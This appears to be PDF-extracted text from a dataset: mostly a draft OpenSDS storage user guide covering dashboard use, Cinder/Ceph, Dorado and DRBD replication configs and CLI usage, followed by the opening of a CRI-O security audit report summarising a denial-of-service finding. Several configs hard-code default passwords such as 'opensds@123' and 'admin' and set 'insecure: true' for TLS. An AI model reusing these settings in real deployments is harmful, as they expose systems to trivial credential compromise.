Login Log into dashboard as admin. Password is opensds@123 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 12 5.1.1.2 Create tenant Go to the tab: Identity/Tenant, click “Create” button and input the necessary information, then submit the request. \n 5.1.1.3 Create user Go to the tab: Identity/User, click “Create” button and input the necessary information, then submit the request. Notes: On the page of creation, you can specify tenants that the user belongs to. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 13 5.1.1.4 Create profile Go to the tab: Profile, click “Create” button and input the necessary information, then submit the request. \n 5.1.1.5 View resources Go to Resource tab, check Availability Zone, Region and Storage resources. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 14 \n Tenant provision volume 5.1.2.1 Overview Log into dashboard as user(user1). The home page shows statistics of volumes, snapshots and replications. \n 5.1.2.2 Create volume Go to the tab: Volume/Volume, click “Create” button and input the necessary information, such as name, size, profile, etc., then submit the request. 
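The same operation is also available from the CLI described in section 6.4; for example, to create a 1 GB volume named test-001 and confirm that it exists (assuming osdsctl has been configured as in section 4.4):
osdsctl volume create 1 --name=test-001
osdsctl volume list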
5.1.2.3 Expand volume size
Go to the tab: Volume/Volume, select a volume and click the "More/Expand" button to extend the volume size.
5.1.2.4 Create volume snapshot
Go to the tab: Volume/Volume, select a volume and click the "Create Snapshot" button to create a volume snapshot.
5.1.2.5 Create volume from snapshot
Go to the tab: Volume/Volume, select a volume and click the volume name to enter the volume detail page. Select a snapshot and click the "Create volume" button to create a volume.
5.1.2.6 Create volume replication
Go to the tab: Volume/Volume, select a volume and click the "Create Replication" button to create a replication. Input the secondary volume name, availability zone and profile, then submit the request.
Note: To configure a storage backend with replication capabilities, see section 5.4 Array-based Replication using Dorado.
5.1.2.7 Disable/Enable/Failover volume replication
Go to the tab: Volume/Volume, select the protected volume and click the volume name to enter the volume detail page. On the replication tab page, click the "Disable/Enable/Failover" button to control the replication.
5.1.2.8 Create volume group
Go to the tab: Volume/Volume Group, click the "Create" button to create a volume group.
5.1.2.9 Add volumes into group
Go to the tab: Volume/Volume Group, select a volume group and go into the volume group detail page. Click the "Add" button to add volumes into the volume group.
5.1.2.10 Tenant isolation
Log out and log in as user2 and verify that user2 can view volumes created by user1.
Log out and log in as the administrator (admin), who can manage the volumes of all tenants.
5.2 Kubernetes
A Kubernetes cluster runs on bare metal or a VM and uses OpenSDS to provision storage through the following drivers:
- Native LVM driver
- Native Ceph driver
- Native Dorado driver
- Cinder driver with Cinder stand-alone (LVM by default)
Refer to the Installation section to see how to use the OpenSDS CSI plugin to provision storage for Kubernetes.
5.3 OpenStack
There are two ways for OpenSDS to integrate with OpenStack.
- OpenSDS provisions storage through the southbound Cinder driver. Cinder can be Cinder stand-alone or part of an OpenStack deployment. See the Installation section on how to install OpenSDS to test with the Cinder driver.
- OpenSDS provisions storage in an OpenStack deployment through the Cinder compatible API. In this case the layer below OpenSDS can be either a southbound native driver or the Cinder driver.
Use OpenSDS to Manage Cinder Drivers
As the backend of OpenSDS, Cinder supports many kinds of storage, so OpenSDS can manage other storage with the help of Cinder. However, the OpenSDS installer only supports Cinder with LVM; in order to manage other storage supported by Cinder, you need to configure the Cinder backend manually. This section shows an example using Ceph as the Cinder backend.
5.3.1.1 Prepare
A recommended deployment would look like the diagram below. We need three hosts for this testing, say Host A (IP: 192.168.0.99), Host B (IP: 192.168.0.20) and Host C (IP: 192.168.0.21).
Note: the Keystone on Host A is used for OpenSDS authentication and the Keystone on Host B is used for OpenStack authentication; there is no relationship between them.
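Because two independent Keystone services are involved, it is easy to point a CLI at the wrong one during testing. As a sketch (the exact credential setup depends on how Keystone was deployed on each host), keep the OpenSDS variables from section 4.4 pointed at Host A, and only source the devstack openrc from Host B when you intend to run OpenStack/Cinder commands:
export OPENSDS_ENDPOINT=http://192.168.0.99:50040
export OPENSDS_AUTH_STRATEGY=keystone
source /opt/stack/devstack/openrc admin admin    # OpenStack credentials on Host B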
5.3.1.2 Install OpenStack using devstack
You can refer to this document: https://docs.openstack.org/devstack/latest/
5.3.1.3 Install ceph using ansible
You can refer to this document: http://docs.ceph.com/ceph-ansible/master/
Install Kubernetes using the local cluster (see section 4.2).
5.3.1.4 Configuration
5.3.1.4.1 OpenSDS
There are two configuration files we need to edit for OpenSDS:
• /etc/opensds/opensds.conf
• /etc/opensds/driver/cinder.yaml
An example would be like this:
1. /etc/opensds/opensds.conf
[keystone_authtoken]
memcached_servers = localhost:11211
signing_dir = /var/cache/cinder
cafile = /opt/stack/data/ca-bundle.pem
project_domain_name = Default
project_name = service
user_domain_name = Default
password = opensds@123
username = opensds
auth_url = http://192.168.0.99/identity
auth_type = password
[cinder]
name = cinder
description = Cinder Test
driver_name = cinder
config_path = /etc/opensds/driver/cinder.yaml
[osdslet]
api_endpoint = 0.0.0.0:50040
graceful = True
log_file = /var/log/opensds/osdslet.log
socket_order = inc
auth_strategy = keystone
[osdsdock]
api_endpoint = 192.168.0.99:50050
2. /etc/opensds/driver/cinder.yaml
authOptions:
  endpoint: "http://192.168.0.20/identity"
  domainName: "Default"
  username: "admin"
  password: "admin"
  tenantName: "admin"
pool:
  ecs-351b@ceph#ceph:
    storageType: block
    availabilityZone: default
    extras:
      dataStorage:
        provisioningPolicy: Thin
        isSpaceEfficient: false
      ioConnectivity:
        accessProtocol: iscsi
        maxIOPS: 7000000
        maxBWS: 600
      advanced:
        diskType: SSD
        latency: 3ms
Then you can restart OpenSDS manually.
5.3.1.4.2 Set ceph as backend of Cinder
Operation on Node C:
1. Create a pool in ceph:
ceph osd pool create rbd 64
2. Copy the ceph.conf to Host B, which contains the cinder-volume server:
ssh {your-openstack-server} sudo tee /etc/ceph/ceph.conf </etc/ceph/ceph.conf
3. Set the cinder authentication in ceph:
ceph auth get-or-create client.cinder mon 'allow r' osd 'allow class-read object_prefix rbd_children, allow rwx pool=volumes, allow rwx pool=vms, allow rwx pool=images'
4. Generate the authentication file and copy it to Host B:
ceph auth get-or-create client.cinder | ssh {your-volume-server} sudo tee /etc/ceph/ceph.client.cinder.keyring
ssh {your-cinder-volume-server} sudo chown stack:stack /etc/ceph/ceph.client.cinder.keyring
Operation on Node B:
1. Install python-rbd and ceph-common, which are needed for the Cinder Ceph backend:
sudo apt-get install python-rbd
sudo apt-get install ceph-common
2. Modify the Cinder configuration file /etc/cinder/cinder.conf on Node B:
[DEFAULT]
...
default_volume_type = ceph
enabled_backends = ceph
...
[ceph]
volume_driver = cinder.volume.drivers.rbd.RBDDriver
volume_backend_name = rbd
rbd_pool = volumes
rbd_ceph_conf = /etc/ceph/ceph.conf
rbd_flatten_volume_from_snapshot = false
rbd_max_clone_depth = 5
rbd_store_chunk_size = 4
rados_connect_timeout = -1
glance_api_version = 2
3. Restart the cinder-volume server:
sudo systemctl restart devstack@c-vol.service
4. Delete the default volume type:
cinder type-delete 1fd30cdc-63d0-4b1d-9e88-3b7b58f05d73
5.3.1.5 Testing
Create a volume.
OpenSDS with Cinder Compatible API
The Cinder Compatible API adapter is not built in as part of the ansible deployment tool. Follow the instructions below to install it.
5.3.2.1 Installation
1.
The Cinder Compatible API only supports cinder's current Api(v3). You can use devstack to install cinder when testing, but in order to use cinder's current Api(v3), branch for devstack must be stable/queens. 2. When devstack is installed, kill all cinder processes. 3. Run the \"source /opt/stack/devstack/openrc admin admin\" command to execute the openstack's cli command. 4. Run the \"openstack endpoint list\" command to view the cinder endpoint. 5. Run the command \"export CINDER_ENDPOINT=http://10.10.10.10:8776/v3\". The actual value of CINDER_ENDPOINT is determined by the previous step. 6. Run the command export OPENSDS_ENDPOINT=http://127.0.0.1:50040. 7. Download the opensds source (https://github.com/opensds/opensds.git) and install opensds. 8. Run the command \"go build -o ./build/out/bin/cindercompatibleapi github.com/opensds/opensds/contrib/cindercompatibleapi\". 9. Execute the command \"./build/out/bin/cindercompatibleapi\". \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 26 10. Execute some cinder cli commands to see if the result is correct. For example, if you execute the command \"cinder type-list\", the results will show the profile of opensds. 5.3.2.2 Volume Types 5.3.2.2.1 List all volume types (default policy) cinder type-list 5.3.2.2.2 Delete a volume type cinder type-delete \n 5.3.2.2.3 List all volume types(0) cinder type-list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 27 5.3.2.2.4 Create a volume type cinder type-create type00 --description test_type_00 5.3.2.2.5 Show volume type detail cinder type-show Id \n 5.3.2.2.6 Create a volume type(2nd) cinder type-create type01 --description test_type_01 5.3.2.2.7 List all volume types (2) cinder type-list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 28 5.3.2.2.8 Update an encryption type cinder type-update 7abff35e-0cbb-4c48-8bab-4fe7c3286792 --name type0 --description test_type_0 --is-public true If is-public is not set, false is the default which is not supported by opensds: 5.3.2.2.9 Lists current volume types and extra specs. 
cinder extra-specs-list \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 29 5.3.2.2.10 Create or update extra specs for volume type cinder type-key 7abff35e-0cbb-4c48-8bab-4fe7c3286792 set key1=value1 \n 5.3.2.2.11 Delete extra specification for volume type cinder type-key 7abff35e-0cbb-4c48-8bab-4fe7c3286792 unset key1 \n 5.3.2.3 Volumes 5.3.2.3.1 List accessible volumes with details (0) cinder list \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 30 5.3.2.3.2 Create a volume (1st) cinder create 1 --name volume00 \n 5.3.2.3.3 List accessible volumes with details (1) cinder list 5.3.2.3.4 Show a volume’s details cinder show <volume uuid> 5.3.2.3.5 Delete a volume cinder delete <volume uuid> 5.3.2.4 Snapshots \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 31 5.3.2.4.1 Create a snapshot cinder snapshot-create <volume uuid> 5.3.2.4.2 List snapshots and details cinder snapshot-list 5.3.2.4.3 Show a snapshot’s details cinder snapshot-show <snapshot uuid> 5.3.2.4.4 Delete a snapshot cinder snapshot-delete <snapshot uuid> 5.3.2.5 Attachments 5.3.2.5.1 Create attachment cinder attachment-create cinder results: Cinder compatible API results: \n 5.3.2.5.2 Show attachment Cinder attachment-show \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 32 cinder results: \n Cinder compatible API results: \n 5.3.2.5.3 List attachment cinder attachment-list cinder results: Cinder compatible API results: 5.3.2.5.4 Update attachment cinder attachment-update Cinder compatible API results: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 33 5.3.2.5.5 Delete attachment cinder attachment-delete cinder results: \n Cinder compatible API results: \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 34 5.4 Array-based Replication using Dorado \n Without Kubernetes Test using Dashboard and CLI 5.4.1.1 Configuration In array-based replication scenario, we need to depoly opensds in two nodes. Node A includes dashboard, keystone, osdslet, osdsdock(provisioner) and etcd. For simplifying the testing scenario, node B includes just only includes osdsdock. \nNOTE: MGT IP means management ip, ETH IP is used for iscsi. There are two configurations we need to config: • /etc/opensds/opensds.conf • /etc/opensds/driver/dorado.yaml An example in Node A (192.168.56.100) would be like this: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 35 1. /etc/opensds/opensds.conf \n [keystone_authtoken] memcached_servers = 8.46.186.191:11211 signing_dir = /var/cache/opensds cafile = /opt/stack/data/ca-bundle.pem auth_uri = http://8.46.186.191/identity project_domain_name = Default project_name = service user_domain_name = Default password = opensds@123 username = opensds auth_url = http://8.46.186.191/identity auth_type = password [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = keystone [osdsdock] api_endpoint = 192.168.56.100:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 36 2. /etc/opensds/driver/dorado.yaml \n Then you can start opensds servers. 
Start etcd server: etcd --advertise-client-urls http://192.168.56.100:2379 --listen-client-urls http://192.168.56.100:2379 --listen-peer-urls http://127.0.0.1:2380 Start up osdslet: osdslet --logtostderr -v 8 Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 An example in Node B(192.168.56.101) would be like this: authOptions: endpoints: \"https://192.168.56.200:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool001: diskType: SSD AZ: default accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.200 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 37 1. /etc/opensds/opensds.conf \n 2. /etc/opensds/driver/dorado.yaml \n In node B you just should only start up osdsdock(provisioner). Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 authOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.200/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool_210038bc0177ae4f: diskType: SSD availabilityZone: secondary accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.201 [osdsdock] api_endpoint = 192.168.56.101:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado_remote description = Huawei OceanStor Dorado Remote array driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 38 5.4.1.2 Testing Here is the usage of replication CLI. 1. Create replication. Usage: osdsctl replication create <primary volume id> <secondary volume id> [flags] Flags: -d, --description string the description of created replication -h, --help help for create -n, --name string the name of created replication -p, --primary_driver_data string the primary replication driver data of created replication -m, --replication_model string the replication mode of created replication, value can be sync/async -t, --replication_period int the replication period of created replication, the value must greater than 0 (default 120) -s, --secondary_driver_data string the secondary replication driver data of created replication 2. List replication. Usage: osdsctl replication list [flags] Flags: -h, --help help for list Global Flags: --debug shows debugging output. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 39 3. Show a replication Usage: osdsctl replication show <replication id> [flags] Flags: -h, --help help for show Global Flags: --debug shows debugging output. 4. Enable replication. Usage: osdsctl replication enable <replication id> [flags] Flags: -h, --help help for enable Global Flags: --debug shows debugging output. 5.disable replication Usage: osdsctl replication disable <replication id> [flags] Flags: OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 40 -h, --help help for disable Global Flags: --debug shows debugging output. 6. 
Failover replication Usage: osdsctl replication failover <replication id> [flags] Flags: -a, --allow_attached_volume whether allow attached volume when failing over replication -h, --help help for failover -s, --secondary_backend_id string the secondary backend id of failoverr replication Global Flags: --debug shows debugging output. 7. delete replication Usage: osdsctl replication delete <replication id> [flags] Flags: -h, --help help for delete Global Flags: --debug shows debugging output. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 41 \n With Kubernetes 5.4.2.1 Configuration OpenSDS provide storage to kubernetes using CSI plugin. OpenSDS replication feature also works in kubernetes, when an application pod crashes and the replication status is failedOver, the OpenSDS CSI plugin will switch to the secondary volume automatically. This is totally invisible for users. A simplest testing deployment would be like blow. \nNOTE: MGT IP means management ip, ETH IP is used for iscsi. There are two configurations we need to config: • /etc/opensds/opensds.conf • /etc/opensds/driver/dorado.yaml An example in Node A (192.168.56.100) would be like this: 1. /etc/opensds/opensds.conf \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 42 [keystone_authtoken] memcached_servers = 8.46.186.191:11211 signing_dir = /var/cache/opensds cafile = /opt/stack/data/ca-bundle.pem auth_uri = http://8.46.186.191/identity project_domain_name = Default project_name = service user_domain_name = Default password = opensds@123 username = opensds auth_url = http://8.46.186.191/identity auth_type = password [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = keystone [osdsdock] api_endpoint = 192.168.56.100:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 43 2. /etc/opensds/driver/dorado.yaml \n Then you can start opensds servers. Start etcd server: etcd --advertise-client-urls http://192.168.56.100:2379 --listen-client-urls http://192.168.56.100:2379 --listen-peer-urls http://127.0.0.1:2380 Start up osdslet: osdslet --logtostderr -v 8 Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 An example in Node B(192.168.56.101) would be like this: authOptions: endpoints: \"https://192.168.56.200:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool001: diskType: SSD AZ: default accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.200 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 44 1. /etc/opensds/opensds.conf \n 2. /etc/opensds/driver/dorado.yaml \n In node B you just should only start up osdsdock(provisioner). 
Start up osdsdock(provisioner): osdsdock --logtostderr -v 8 authOptions: endpoints: \"https://192.168.56.201:8088/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true replication: remoteAuthOptions: endpoints: \"https://192.168.56.200/deviceManager/rest\" username: \"opensds\" password: \"opensds@123\" insecure: true pool: StoragePool_210038bc0177ae4f: diskType: SSD availabilityZone: secondary accessProtocol: iscsi thinProvisioned: true compressed: true advanced: deduped: true targetIp: 192.168.57.201 [osdsdock] api_endpoint = 192.168.56.101:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = huawei_dorado [database] endpoint = 192.168.56.100:62379,192.168.56.100:62380 driver = etcd [huawei_dorado] name = huawei_dorado_remote description = Huawei OceanStor Dorado Remote array driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml support_replication = true OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 45 Startup kubernetes local cluster in Node A.If you get information like blow, your kubernetes local_cluster startup successfully. \n5.4.2.2 Testing steps 1. Run command kubectl get pod to confirm the OpenSDS CSI plugin server is up. There will be 3 pods. 2. Add the configuration item enableReplication: \"true\" at parameters section to enable the replication feature. \n# sc_pvc.yaml # This YAML file contains StorageClass and PVC # which are necessary to run nginx with csi opensds driver. apiVersion: storage.k8s.io/v1 kind: StorageClass metadata: name: csi-sc-opensdsplugin provisioner: csi-opensdsplugin parameters: enableReplication: \"true\" --- apiVersion: v1 kind: PersistentVolumeClaim metadata: name: csi-pvc-opensdsplugin spec: accessModes: - ReadWriteOnce resources: requests: storage: 1Gi storageClassName: csi-sc-opensdsplugin OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 46 3. Create StorageClss and PVC. You will find two volumes and a replication in OpenSDS. 4. Start up the nginx application pod. \n 5. Set the replication failed over. \n# nginx.yaml # This YAML file contains nginx apiVersion: v1 kind: Pod metadata: name: nginx spec: containers: - image: nginx imagePullPolicy: IfNotPresent name: nginx ports: - containerPort: 80 protocol: TCP volumeMounts: - mountPath: /var/lib/www/html name: csi-data-opensdsplugin volumes: - name: csi-data-opensdsplugin persistentVolumeClaim: claimName: csi-pvc-opensdsplugin readOnly: false OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 47 6. Restart the nginx, you will find the storage which is used by nginx is switch to secondary. \n 5.5 Host-based Replication using DRBD \n Prepare We need to prepare two hosts for this test, say HostA(IP: 192.168.0.131) and HostB(IP: 192.168.0.66). And before we start, please make sure the OpenSDS is already installed on both hosts. And copy etcdctl, etcd, osdslet, osdsdock, osdsctl to /opt/opensds/bin/. \n Install DRBD Install DRBD as the following steps on both hosts: • sudo add-apt-repository ppa:linbit/linbit-drbd9-stack • sudo apt-get update • sudoapt-get install drbd-utils python-drbdmanage drbd-dkms \n Configuration Before do configuration, please stop opensds service first. That is find out the process id of etcd, osdslet and osdsdock, and kill them. Modify /etc/opensds/opensds.conf: • Add host_based_replication_driver for the osdsdock part on both hosts \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 48 • Change endpoint of database on hostB to the same as HostA. 
Here is the example: [lvm] name = lvm description = LVM Test driver_name = lvm config_path = /etc/opensds/driver/lvm.yaml [osdslet] api_endpoint = 0.0.0.0:50040 graceful = True log_file = /var/log/opensds/osdslet.log socket_order = inc auth_strategy = noauth [osdsdock] api_endpoint = 192.168.0.131:50050 log_file = /var/log/opensds/osdsdock.log # Specify which backends should be enabled, sample,ceph,cinder,lvm and so on. enabled_backends = lvm host_based_replication_driver = drbd [database] endpoint = 192.168.0.131:62379,192.168.0.131:62380 driver = etcd Add a new configuration file /etc/opensds/attacher.conf on both hosts, here is an example: [osdsdock] api_endpoint = 192.168.0.131:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.0.131 dock_type = attacher [database] endpoint = 192.168.0.131:62379,192.168.0.131:62380 driver = etcd Note: both hosts have the same endpoint of database, but api_endpoint and bind_ip of osdsdock should be the host ip respectively. Add a new configuration file /etc/opensds/drbd.yaml on both hosts, the content is: #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: ecs-37cc IP: 192.168.0.66 Node-ID: 1 - Hostname: ecs-32bc IP: 192.168.0.131 Node-ID: 0 Note: Hostname and IP should be the real value of each hosts. Modify /etc/opensds/driver/lvm.yaml on hostB, change availabilityZone to a new value. Here is an example: tgtBindIp: 192.168.0.66 OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 49 tgtConfDir: /etc/tgt/conf.d pool: opensds-volumes-default: diskType: NL-SAS availabilityZone: secondary extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 5ms \n Create Replication Start services on HostA: • cd /opt/opensds/bin • ./etcd --advertise-client-urls http://192.168.0.131:62379 --listen-client-urls http://192.168.0.131:62379 --listen-peer-urls http://192.168.0.131:62380 --data-dir /opt/opensds/etcd/data >> /var/log/opensds/etcd.log 2>&1 & • ./osdslet & • ./osdsdock & • ./osdsdock --config-file /etc/opensds/attacher.conf & Start services on HostB: • ./osdslet & • ./osdsdock & • ./osdsdock --config-file /etc/opensds/attacher.conf & Create volumes (run them on HostA or hostB): • ./osdsctl volume create 1 -n primary • ./osdsctl volume create 1 -n secondary -a secondary Create replication: • ./osdsctl replication create e0b1c9e3-0c88-4601-b0e7-c09448a89e5c 3ea2e681-4884-4d84-a2e3-d5e3318763b2 \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 50 \n Check result See the block device. Create some data on HostA. • mkfs.ext4 /dev/drbd1 • mount /dev/drbd1 ./reptest/ • touch test • dd if=/dev/zero of=./2 bs=1M count=500 • touch test • …… Check the synchronous status on both hosts. Check if the data is updated on HostB. • umount on HostA • mount on HostB • Check data on HostB, and you can see the data is updated. \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 51 6 OpenSDS CLI Guide 6.1 List Docks Use the following command to display the docks information. osdsctl dock list Sample results are as follows: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl dock list -h Results are as follows: \n Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 52 \n 6.2 List Pools Use the following command to display the pools information. 
osdsctl pool list Sample results are as follows: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl pool list -h Results are as follows: \n Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 53 6.3 Create/Delete Profile Use the following command to create profile. osdsctl profile create * Example: \n Use the following command to delete profile. osdsctl profile delete * Example: 6.4 Create/Delete/Get/List Volume(s) Use the following command to create volume. osdsctl volume create 3 Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 54 Use the following command to display the volume details. osdsctl volume show * Example: \n Use the following command to delete the volume. osdsctl volume delete * Example: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume list -h Results are as follows: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 55 Example: 6.5 Create/Delete/Get/List Snapshot(s) Use the following command to create snapshot. osdsctl volume snapshot create * Example: \n Use the following command to display snapshot details. osdsctl volume snapshot show * Example: \n \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 56 Use the following command to delete snapshot. osdsctl volume snapshot delete * Example: Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume snapshot list -h Results are as follows: \n 6.6 Create Volume from Snapshot Use the following command to create volume from snapshot. osdsctl volume create 1 –s * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 57 6.7 Expand Volume Use the following command to expand volume size. osdsctl volume extend * * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 58 6.8 Create/Update/Delete/Get/List Volume Groups Use the following command to create volume group. osdsctl volume group create –-profiles * Example: \n Use the following command to update volume group. osdsctl volume group update groupId -a “volumeId1, volumeId2” * Use the following command to show volume group. osdsctl volume group show * \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 59 Example: \n Display specific results by filter parameters. Filter parameters can be displayed by the following command. osdsctl volume group list -h Results are as follows: \n Example: Use the following command to update volume group. osdsctl volume group update * Example: \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 60 Use the following command to delete volume group. osdsctl volume group delete * Example: 6.9 Replication Here is the usage of replication CLI. 1. Create replication. Usage: osdsctl replication create <primary volume id> <secondary volume id> [flags] Flags: -d, --description string the description of created replication -h, --help help for create -n, --name string the name of created replication -p, --primary_driver_data string the primary replication driver data of created replication -m, --replication_model string the replication mode of created replication, value can be sync/async \nOpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 61 -t, --replication_period int the replication period of created replication, the value must greater than 0 (default 120) -s, --secondary_driver_data string the secondary replication driver data of created replication 2. List replication. Usage: osdsctl replication list [flags] Flags: -h, --help help for list Global Flags: --debug shows debugging output. 3. 
Show a replication Usage: osdsctl replication show <replication id> [flags] Flags: -h, --help help for show Global Flags: --debug shows debugging output. 4. Enable replication. OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 62 Usage: osdsctl replication enable <replication id> [flags] Flags: -h, --help help for enable Global Flags: --debug shows debugging output. 5.disable replication Usage: osdsctl replication disable <replication id> [flags] Flags: -h, --help help for disable Global Flags: --debug shows debugging output. 6. Failover replication Usage: osdsctl replication failover <replication id> [flags] Flags: -a, --allow_attached_volume whether allow attached volume when failing over replication -h, --help help for failover -s, --secondary_backend_id string the secondary backend id of failoverr replication OpenSDS DATE: 07/09/18 \nOpenSDS DRAFT 63 Global Flags: --debug shows debugging output. 7. delete replication Usage: osdsctl replication delete <replication id> [flags] Flags: -h, --help help for delete Global Flags: --debug shows debugging output. " } ]
{ "category": "Runtime", "file_name": "2022_security_audit_adalogics.pdf", "project_name": "CRI-O", "subcategory": "Container Runtime" }
[ { "data": "P R E S E N T S \nC R I - O S e c u r i t y A u d i t\nIn collaboration with the CRI-O project maintainers and The Open Source Technology\nImprovement Fund, Inc (OSTIF), Cloud Native Computing Foundation and Chainguard.\nostif.org\nA u t h o r s\nAdam Korczynski\n<\nadam@adalogics.com\n>\nDavid Korczynski\n<\ndavid@adalogics.com\n>\nDate: 6 June 2022\nThis report is licensed under Creative Commons 4.0 (CC BY 4.0)\nCRI-O security audit, 2022\nExecutive summary\nThis report outlines a security engagement of the CRI-O project. CRI-O is an implementation\nof the Kubernetes Container Runtime Interface. The goal of this engagement was to conduct\na holistic security assessment of CRI-O, which means that the engagement had several\nhigh-level tasks.\nThis security audit was performed by Ada Logics in collaboration with CRI-O maintainers,\nOSTIF, CNCF and Chainguard. Ada Logics performed the security work described in the first\npart of the report and Chainguard carried out a supply chain security assessment, which is\nfound in the report appendix.\nThe assessment includes four high-level tasks:\n●\nThreat model formalisation of CRI-O.\n●\nFuzzing integration of CRI-O into OSS-Fuzz, including fourteen designated fuzzers.\n●\nManual code auditing.\n●\nDocumentation/testing review\nMost of the efforts in the engagement were spent on the first three items listed above, and\nparticularly much on fuzzing and code auditing.\nThe primary security finding of the work is a single high-severity issue. A few minor issues\nwere found as well, however, our view from completing this audit is that CRI-O is a\nwell-written project that has a high level of security assurance.\nThe high severity finding is a denial of service attack on a given cluster by way of resource\nexhaustion of nodes. The attack is performed by way of pod creation, which means any user\nthat can create a pod can cause denial of service on the given node that is used for pod\ncreation. The CVE for this vulnerability is\nCVE-2022-1708.\nInterestingly, the denial of service attack also occurred in other container runtime interface\nimplementations, most notably Containerd. Specifically, the exact same attack that exhausts\nmemory in CRI-O can be used to exhaust memory of Containerd. 
